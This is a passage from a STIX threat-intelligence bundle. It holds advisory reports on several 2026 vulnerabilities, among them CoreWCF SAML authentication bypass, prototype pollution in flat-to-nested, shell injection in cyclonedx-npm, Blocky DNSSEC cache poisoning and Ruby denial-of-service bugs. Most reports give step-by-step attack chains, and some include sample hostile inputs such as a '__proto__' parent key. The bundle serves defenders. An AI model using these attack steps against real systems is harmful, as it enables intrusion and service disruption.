      "description": "## Overview\n\nA critical authentication bypass vulnerability, CVE-2026-54781, has been identified in CoreWCF versions prior to 1.8.1 and in versions 1.9.0 before 1.9.1. This flaw affects applications configured to accept SAML 1.1 tokens via federation bindings such as WS2007FederationHttpBinding or WSFederationHttpBinding. Attackers can exploit this by obtaining or crafting SAML 1.1 assertions that either lack KeyInfo for holder-of-key confirmation or employ a non-standard SubjectConfirmation method URI. CoreWCF's failure to enforce these critical security mechanisms allows a malicious actor to authenticate as the assertion’s subject without valid proof of authority, thereby circumventing per-method policies and gaining unauthorized access. This vulnerability impacts the integrity of authentication in federated environments using CoreWCF and could lead to unauthorized data access or sensitive actions.\n\n## Attack Chain\n\n1.  **Target Identification**: The attacker identifies a CoreWCF service configured to accept SAML 1.1 tokens via federation bindings (e.g., WS2007FederationHttpBinding, WSFederationHttpBinding).\n2.  **Assertion Acquisition/Crafting (Holder-of-key bypass)**: The attacker obtains a holder-of-key SAML 1.1 assertion that was issued without `KeyInfo` (due to an issuer bug or custom STS shape) or crafts one if possible.\n3.  **Assertion Acquisition/Crafting (Custom-method bypass)**: Alternatively, the attacker obtains or arranges the issuance of a SAML 1.1 assertion bearing a non-standard `SubjectConfirmationMethod` URI (e.g., from a permissive STS or experimental IDP).\n4.  **Assertion Presentation**: The attacker sends an HTTP POST request containing the crafted SAML 1.1 assertion to the vulnerable CoreWCF service's federation endpoint.\n5.  **Vulnerable Processing**: The CoreWCF service processes the SAML 1.1 assertion but fails to enforce the `SubjectConfirmation` methods or validate the presence of `KeyInfo` for holder-of-key assertions, as dictated by CVE-2026-54781.\n6.  **Authentication Bypass**: The vulnerable CoreWCF application incorrectly validates the assertion, authenticating the attacker as the assertion's legitimate subject.\n7.  **Sensitive Action Execution**: With compromised authentication, the attacker can now perform sensitive actions or access protected resources, bypassing the security controls that would normally require proof of key possession or adherence to specific confirmation methods.\n\n## Impact\n\nThe vulnerability allows an attacker to completely bypass authentication mechanisms within relying applications built on CoreWCF, assuming they are configured to accept SAML 1.1 tokens via federation. If exploited, an attacker can impersonate any user for whom they can obtain or craft a suitable SAML assertion, gaining unauthorized access to the application's functionality and data. This leads to a complete compromise of confidentiality, integrity, and availability within the scope of the affected application. The impact includes unauthorized access to sensitive information, execution of administrative functions, and potential for further lateral movement or system compromise, circumventing security policies specifically designed to enforce strong authentication for sensitive operations.\n\n## Recommendation\n\n*   **Patch CVE-2026-54781**: Immediately upgrade all affected CoreWCF installations to version 1.8.1 or later, or to version 1.9.1 or later, as per the references in this brief.\n*   **Review STS Configuration**: Review the configuration of trusted Security Token Services (STS) to ensure they do not issue SAML assertions without `KeyInfo` for holder-of-key methods or with non-standard `SubjectConfirmationMethod` URIs, as mentioned in the workaround section of this brief.\n*   **Deploy Sigma Rule**: Deploy the `Detect CVE-2026-54781 - Access to CoreWCF Federation Endpoints` Sigma rule to your SIEM to monitor for HTTP POST requests to federation endpoints.\n*   **Enable Webserver Logging**: Ensure detailed webserver logging is enabled, capturing `cs-uri-stem`, `cs-method`, `sc-status`, and `cs-bytes` for all requests to CoreWCF endpoints to aid in detecting anomalous activity.\n",
      "published": "2026-06-19T21:10:36Z",
      "labels": [
        "authentication-bypass",
        "saml",
        "corewcf",
        "vulnerability",
        "server-side"
      ],
      "object_refs": [
        "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-48pq-2xq3-c2m4"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7669abfb-cbff-52ce-808b-863eaf2e3266",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4c5d62ab-0a6c-56ff-9030-d108c5d2665c",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e2bebde0-7a37-5503-ab73-0602c6a8b39a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4c5d62ab-0a6c-56ff-9030-d108c5d2665c",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--22a5cc6c-6573-5c3f-bb60-3820289b73e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4c5d62ab-0a6c-56ff-9030-d108c5d2665c",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4c5d62ab-0a6c-56ff-9030-d108c5d2665c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "flat-to-nested: Prototype pollution in convert() via __proto__ parent/id key (CVE-2026-55091)",
      "description": "## Overview\n\nA critical prototype pollution vulnerability, tracked as CVE-2026-55091, exists in the `flat-to-nested` npm package, affecting all versions up to and including 1.1.1. The `convert()` function, designed to transform flat data structures into nested trees, improperly uses input `id` and `parent` field values directly as object keys without proper sanitization. This oversight allows an attacker to manipulate these fields, specifically by setting a record's `parent` field to the string \"__proto__\". When processed, this causes the `flat-to-nested` library to write attacker-controlled data onto the global `Object.prototype`, which can lead to severe consequences. The vulnerability requires no special privileges or user interaction, as malicious values can be embedded in ordinary application input data. This pollution is stealthy, as existing base prototype methods remain intact, making detection challenging.\n\n## Attack Chain\n\n1.  An attacker crafts input data containing a record designed to exploit the vulnerability (e.g., via a web request or file upload).\n2.  The crafted record includes a field designated as the `parent` identifier (e.g., `parent: '__proto__'`) and additional attacker-controlled data (e.g., `polluted: 'PWNED'`).\n3.  An application utilizing the `flat-to-nested` library processes this attacker-controlled input data using the `FlatToNested.prototype.convert()` function.\n4.  During the `convert()` function's execution, the value of the `parent` field (`__proto__`) is used to access the `temp` object.\n5.  Due to JavaScript's prototype chain, `temp['__proto__']` resolves to `Object.prototype` because `temp` is a plain object inheriting from `Object.prototype`.\n6.  The `initPush()` helper function is subsequently called with `Object.prototype` as the target object, attempting to modify it.\n7.  `initPush()` then assigns a new property (e.g., `children`) to the global `Object.prototype` and pushes the attacker's `flatEl` (including the `polluted: 'PWNED'` data) into it.\n8.  The global `Object.prototype` is now polluted, potentially altering the behavior of all objects in the application, leading to application logic corruption, denial of service, or serving as a gadget for remote code execution or privilege escalation.\n\n## Impact\n\nThe impact of CVE-2026-55091 is significant, potentially affecting any service that processes attacker-influenced data through the `flat-to-nested` library to build tree structures. This type of prototype pollution (CWE-1321) can manifest as application-logic corruption, where core functionality behaves unpredictably, leading to denial of service through crashes or unexpected termination. More severely, if the polluted prototype properties are used in security-sensitive contexts or object deserialization, it can pave the way for privilege escalation or remote code execution (RCE). The stealthy nature of the pollution, where base prototype methods remain intact, makes the compromise harder to detect through standard application monitoring.\n\n## Recommendation\n\n*   Upgrade the `flat-to-nested` npm package to a version greater than 1.1.1 immediately to patch CVE-2026-55091.\n*   Implement Web Application Firewall (WAF) rules or API gateway policies to block requests containing `__proto__` as a key or value in sensitive parameters, as indicated by the Sigma rules provided.\n*   Deploy the provided Sigma rules to your SIEM and tune for your environment, specifically looking for `__proto__` in `cs-uri-query` and `cs-uri-body` fields in webserver logs.\n*   Review application code for instances where user-controlled input directly influences object property names or values without proper sanitization, especially in Node.js applications.\n",
      "published": "2026-06-19T20:57:58Z",
      "labels": [
        "prototype-pollution",
        "nodejs",
        "npm",
        "supply-chain",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-hp36-v28f-w3r4"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f569a79a-9b8c-5449-9b8a-6274e4412a52",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9f21ba8d-bf88-50e2-ba91-7d8cef8102ed",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1087",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1087",
          "url": "https://attack.mitre.org/techniques/T1087"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b5215e1d-d32c-539f-bd5f-10eb595a4707",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9f21ba8d-bf88-50e2-ba91-7d8cef8102ed",
      "target_ref": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1003",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1003",
          "url": "https://attack.mitre.org/techniques/T1003"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6bd08233-70fd-5a77-9f02-729dc4d7770b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9f21ba8d-bf88-50e2-ba91-7d8cef8102ed",
      "target_ref": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4b6c1325-b074-5684-b886-5c1795de97d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9f21ba8d-bf88-50e2-ba91-7d8cef8102ed",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9f21ba8d-bf88-50e2-ba91-7d8cef8102ed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "@cyclonedx/cyclonedx-npm Shell Injection via Unsanitized --workspace Argument",
      "description": "## Overview\n\nA critical command injection vulnerability (CVE-2026-55849) has been identified in the `@cyclonedx/cyclonedx-npm` CLI tool, affecting versions \u003e= 2.1.0 and \u003c 5.0.0. This flaw allows an attacker to execute arbitrary operating system commands on a compromised system. The vulnerability arises when the tool is invoked with the `--workspace \u003cvalue\u003e` option, and the `npm_execpath` environment variable is either unset or empty. In such a scenario, user-supplied workspace values are directly interpolated into a subshell command string without proper sanitization, enabling shell metacharacters to be interpreted as commands. This issue, categorized as CWE-78 (Improper Neutralization of Special Elements used in an OS Command), poses a significant risk to developers and organizations utilizing the affected versions of the tool, potentially leading to data exfiltration, local privilege escalation, or full system compromise. The vulnerability was resolved in version 5.0.0.\n\n## Attack Chain\n\n1.  **Attacker Crafts Malicious Input**: The attacker prepares a specially crafted `--workspace` argument containing shell metacharacters (e.g., `;`, `\u0026\u0026`, `|`) followed by arbitrary OS commands, designed to break out of the intended command context.\n2.  **User Execution**: A user or automated process executes the vulnerable `cyclonedx-npm` CLI tool, inadvertently supplying the attacker's malicious `--workspace` argument.\n3.  **Vulnerable Code Path Triggered**: During execution, the `cyclonedx-npm` tool checks the `npm_execpath` environment variable; if it is unset or empty, the tool falls back to a vulnerable subshell execution path.\n4.  **Command String Interpolation**: The tool directly interpolates the unsanitized malicious `--workspace` value into an internal shell command string.\n5.  **Subshell Execution**: The operating system's shell receives and parses the malformed command string, interpreting the injected shell metacharacters and executing the attacker's arbitrary OS commands.\n6.  **Initial Command Execution**: The attacker gains arbitrary command execution with the privileges of the user running the `cyclonedx-npm` process.\n7.  **Impactful Actions**: The injected commands can perform various malicious actions, such as reading sensitive files, modifying system configurations, exfiltrating data, or establishing persistence.\n8.  **Achieve Objective**: The attacker's ultimate objective (e.g., data exfiltration, local privilege escalation, or further network lateral movement) is achieved.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-55849 allows an attacker to execute arbitrary OS commands with the privileges of the user running the `cyclonedx-npm` CLI tool. This can lead to severe consequences including unauthorized access to sensitive data, file modification or deletion, and local privilege escalation, depending on the context in which the tool is used. For development environments, this could mean compromise of build systems, source code repositories, or deployment pipelines. While no specific victim counts are available, any organization using vulnerable versions of `@cyclonedx/cyclonedx-npm` (v2.1.0 to v4.x.x) is at risk, particularly if they process untrusted input or operate in environments where `npm_execpath` is frequently unset.\n\n## Recommendation\n\n*   **Upgrade immediately**: Upgrade `@cyclonedx/cyclonedx-npm` to version 5.0.0 or later to apply the complete fix for CVE-2026-55849.\n*   **Implement temporary mitigation**: For systems that cannot be immediately upgraded, ensure the `npm_execpath` environment variable is explicitly set with a valid path to the `npm` executable before invoking `cyclonedx-npm`.\n*   **Deploy the Sigma rules**: Deploy the provided Sigma rules to your SIEM solution to detect attempts to exploit CVE-2026-55849 by identifying suspicious command-line arguments.\n*   **Enable process-creation logging**: Ensure comprehensive process-creation logging (e.g., Sysmon on Windows, Auditd on Linux) is enabled on all developer workstations and build servers to capture the necessary telemetry for the detection rules.\n",
      "published": "2026-06-19T20:59:00Z",
      "labels": [
        "command-injection",
        "supply-chain",
        "npm",
        "cyclonedx",
        "cli",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
        "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-v75r-vx73-82pj"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Man-in-the-Middle",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1557",
          "url": "https://attack.mitre.org/techniques/T1557"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--df27a18d-8082-5ba5-a377-42e9973920ef",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4ae10c75-8173-51a8-bd79-d9cc5bb466b0",
      "target_ref": "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--db3e4d53-1b6e-529c-af30-a998bf165ac2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4ae10c75-8173-51a8-bd79-d9cc5bb466b0",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--806d6848-7735-5cb6-9fd4-5a9d09f4c41c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4ae10c75-8173-51a8-bd79-d9cc5bb466b0",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4ae10c75-8173-51a8-bd79-d9cc5bb466b0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Blocky DNSSEC validation bypass and validation-cache scope pollution",
      "description": "## Overview\n\nBlocky, a popular open-source DNS proxy and cache, contains a critical vulnerability (GHSA-x845-2f78-7v36) that allows for DNSSEC validation bypass and cache pollution when `dnssec.validate: true` is enabled. Published on 2026-06-19, this flaw allows an attacker to effectively neutralize Blocky's DNSSEC protection and redirect users to malicious destinations. The issue stems from Blocky's improper handling of unsigned DNS responses and forged `Insecure` proofs. Attackers can either send unsigned forged positive answers for DNSSEC-signed domains or pollute Blocky's validation cache with false `Insecure` states using crafted NSEC/NSEC3 records. Both attack paths enable attackers to poison Blocky's cache, leading to clients receiving malicious DNS records even after the attacker's upstream server is offline. This vulnerability severely compromises the integrity of DNS resolution for Blocky users, opening doors for phishing, malware distribution, and man-in-the-middle attacks.\n\n## Attack Chain\n\n1. An attacker compromises or controls an upstream DNS resolver used by Blocky, or is able to intercept and tamper with DNS traffic between Blocky and its legitimate upstreams.\n2. A client machine queries Blocky for a known DNSSEC-signed domain, such as `cloudflare.com A`.\n3. Blocky forwards the DNS query to the attacker-controlled upstream resolver.\n4. **[Path 1: Basic DNSSEC bypass]** The attacker-controlled upstream returns a forged positive answer (e.g., `cloudflare.com A 203.0.113.77`) with no RRSIG records. Blocky incorrectly classifies the response as `ValidationResultInsecure` without validating the domain's delegation chain.\n5. **[Path 2: Validation-cache scope pollution]** Alternatively, the attacker returns a forged A record with a decoy RRSIG, causing Blocky to attempt full RRset validation. When Blocky queries for DS records, the attacker responds with no DS records and an unsigned NSEC/NSEC3 record in the authority section, leading Blocky to cache `ValidationResultInsecure` for the domain.\n6. Blocky processes the malicious response, incorrectly accepts it due to its DNSSEC validation flaws, and returns the forged A record (e.g., `203.0.113.77`) to the client.\n7. Blocky writes the forged DNS record to its local cache, associating it with the target domain.\n8. Subsequent client queries for the same domain are served from Blocky's poisoned cache, even if the malicious upstream resolver is no longer available, directing clients to the attacker's chosen IP address.\n\n## Impact\n\nThis vulnerability allows attackers to perform effective DNS spoofing and cache poisoning against Blocky users, even for domains protected by DNSSEC. Organizations relying on Blocky for DNS resolution, particularly with DNSSEC validation enabled, are at risk of having their users redirected to attacker-controlled infrastructure. This can facilitate sophisticated phishing campaigns, malware delivery, or man-in-the-middle attacks, compromising sensitive data or leading to system infections. The impact is significant as DNSSEC is a fundamental security control meant to prevent such manipulations, and its bypass undermines trust in DNS resolution. The persistent nature of the cache poisoning means the threat lingers even after the initial attack source is removed.\n\n## Recommendation\n\n*   Immediately upgrade Blocky to a patched version that addresses GHSA-x845-2f78-7v36. Consult the vendor advisory for specific patch versions.\n*   Block the IP address `203.0.113.77` at your network perimeter firewall or proxy to prevent connections to known attacker infrastructure identified in the PoC.\n*   Deploy the `Detect Outbound Connection to Blocky PoC IP` Sigma rule to identify any attempts by internal systems to connect to the attacker-controlled IP.\n*   Enable comprehensive `dns_query` and `network_connection` logging on client endpoints and network devices to monitor for suspicious DNS resolutions or outbound connections resulting from cache poisoning.\n",
      "published": "2026-06-19T21:00:49Z",
      "labels": [
        "dnssec",
        "dns-cache-poisoning",
        "dns-spoofing",
        "vulnerability",
        "network"
      ],
      "object_refs": [
        "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-x845-2f78-7v36"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--53e6ed58-d226-5ef5-828c-560ab8381900",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4045e50b-fcf0-5504-80c5-27e8f49e16f7",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4045e50b-fcf0-5504-80c5-27e8f49e16f7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Concurrent Ruby AtomicReference Livelock via Float::NAN (CVE-2026-54904)",
      "description": "## Overview\n\nA high-severity vulnerability, identified as CVE-2026-54904, exists within versions of the `concurrent-ruby` gem prior to 1.3.7. This flaw affects the `Concurrent::AtomicReference#update` method, which can enter an indefinite busy-retry loop if the `AtomicReference` instance stores `Float::NAN`. The issue stems from Ruby's `Float::NAN == Float::NAN` always evaluating to false, preventing the `compare_and_set` operation from ever succeeding. When applications that use `concurrent-ruby` process externally derived numeric values that can become `Float::NAN` (e.g., from network inputs or data feeds), any subsequent call to `#update` on that `AtomicReference` will continuously execute the update block, leading to severe CPU exhaustion and application hangs. This can result in a denial of service for services relying on `concurrent-ruby`, impacting availability and performance.\n\n## Attack Chain\n\n1.  An attacker or faulty upstream data source provides an input that, when processed by the victim application, results in a `Float::NAN` value.\n2.  The victim application, using `concurrent-ruby` (versions \u003c 1.3.7), stores this `Float::NAN` value into an instance of `Concurrent::AtomicReference`.\n3.  A legitimate application thread attempts to update the `AtomicReference` by calling the `Concurrent::AtomicReference#update` method.\n4.  Inside `#update`, the method repeatedly calls `compare_and_set(old_value, new_value)` expecting it to eventually return true.\n5.  During the `compare_and_set` call, the internal comparison `old == old_value` is made, where both `old` and `old_value` are `Float::NAN`. Due to Ruby's NaN semantics, `Float::NAN == Float::NAN` evaluates to `false`.\n6.  Because the comparison fails, `compare_and_set` always returns `false`, causing `#update` to treat it as a failed concurrent update and retry indefinitely.\n7.  The application thread enters a livelock, continuously executing the update block and consuming excessive CPU resources, leading to a denial of service.\n\n## Impact\n\nThis vulnerability directly results in an application-level denial of service. Affected services, particularly those that process and store external numeric data using `Concurrent::AtomicReference`, may experience high CPU utilization, unresponsiveness, and complete service unavailability. If critical business logic or transaction processing relies on these `AtomicReference` updates, services can become permanently hung, requiring manual intervention or restarts. While specific victim counts or targeted sectors are not detailed, any Ruby application utilizing `concurrent-ruby` versions prior to 1.3.7 and handling `Float::NAN` values in an `AtomicReference` is at risk of severe operational disruption.\n\n## Recommendation\n\n*   Upgrade `concurrent-ruby` to version 1.3.7 or higher immediately to patch CVE-2026-54904.\n*   Monitor Ruby application logs for repeated error messages or warnings related to `Concurrent::AtomicReference#update` or `Float::NAN` that could indicate a livelock condition. Deploy the provided `Detect Concurrent Ruby AtomicReference Livelock Attempt` Sigma rule to your SIEM.\n*   Monitor `ruby` process CPU utilization on application servers. Abnormal and sustained high CPU usage for `ruby` processes may indicate a livelock. Deploy the provided `Detect Ruby Process Sustained High CPU Usage` Sigma rule to your SIEM.\n",
      "published": "2026-06-19T21:01:45Z",
      "labels": [
        "denial-of-service",
        "vulnerability",
        "ruby",
        "livelock"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-h8w8-99g7-qmvj"
        }
      ],
      "confidence": 60
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b9a667db-5255-5292-9e7c-48f78ccd610a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Oj: Integer Overflow in Oj.load 2GB String Handling (CVE-2026-54903)",
      "description": "## Overview\n\nThe `oj` Ruby gem, specifically its `Oj.load` function, is affected by CVE-2026-54903, an integer overflow vulnerability that can lead to heap corruption and process termination. This flaw impacts all versions prior to 3.17.2. Attackers can trigger this vulnerability by submitting a crafted JSON string exceeding 2 GB in length to an application utilizing the vulnerable `Oj.load` method. The vulnerability originates in the `read_escaped_str` function within `parse.c`, where a string length calculation (`slen`) overflows to a negative integer due to the 32-bit `int` type. When this negative value is subsequently cast to `size_t` and passed to `memcpy` in `buf_append_string` (`buf.h`), it results in an attempt to copy an astronomically large amount of data out of bounds. This operation causes immediate heap corruption and a denial of service due to application crashes, posing a significant risk to the availability and integrity of affected Ruby applications.\n\n## Attack Chain\n\n1.  An attacker delivers a specially crafted JSON string that is greater than 2 GB in length to a vulnerable Ruby application.\n2.  The affected application processes this input using the `Oj.load` function of the `oj` gem.\n3.  During the parsing of the JSON string, specifically within the `read_escaped_str` function (located in `parse.c`), the length of a segment of the string is computed and stored as a 32-bit `int`.\n4.  Due to the excessive input size, this 32-bit `int` overflows, wrapping around to a large negative value.\n5.  This negative integer value is then implicitly cast to an unsigned `size_t` type before being passed as the length parameter (`slen`) to the `buf_append_string` function (located in `buf.h`).\n6.  The `memcpy` function, called within `buf_append_string`, attempts to copy an extremely large number of bytes (dictated by the `size_t` representation of the negative integer) from the input buffer.\n7.  This `memcpy` operation results in an out-of-bounds write, corrupting adjacent heap memory in the application's process space.\n8.  The heap corruption inevitably leads to an immediate application crash, causing a denial of service for the vulnerable system.\n\n## Impact\n\nThe primary impact of CVE-2026-54903 is a denial of service for any Ruby application that processes attacker-controlled JSON input using the vulnerable `oj` gem. The heap corruption resulting from the integer overflow and subsequent out-of-bounds `memcpy` leads to an immediate process crash. While the advisory primarily highlights crashes and memory corruption, such vulnerabilities can sometimes be chained with other techniques to achieve information disclosure or even arbitrary code execution, though this specific CVE explicitly confirms only process termination and memory corruption. There are no specific victim counts or targeted sectors identified in the advisory, but any organization using the affected `oj` gem in public-facing applications is at risk.\n\n## Recommendation\n\n*   Upgrade the `oj` gem to version 3.17.2 or later immediately to mitigate CVE-2026-54903.\n*   Implement input validation for all JSON payloads processed by Ruby applications, ensuring that incoming string sizes do not exceed reasonable limits (e.g., significantly less than 2 GB) to prevent trigger conditions for vulnerabilities like CVE-2026-54903.\n*   Deploy the Sigma rules provided in this brief to your SIEM/EDR to detect abnormal Ruby process terminations and potential crash indicators.\n*   Ensure detailed application and system logs (e.g., syslog, Windows Event Log) are collected and monitored for crash reports or error messages related to Ruby processes or memory management.\n",
      "published": "2026-06-19T21:03:04Z",
      "labels": [
        "integer-overflow",
        "heap-corruption",
        "ruby-gem",
        "vulnerability",
        "CVE-2026-54903"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-475m-ph3x-64gp"
        },
        {
          "source_name": "reference",
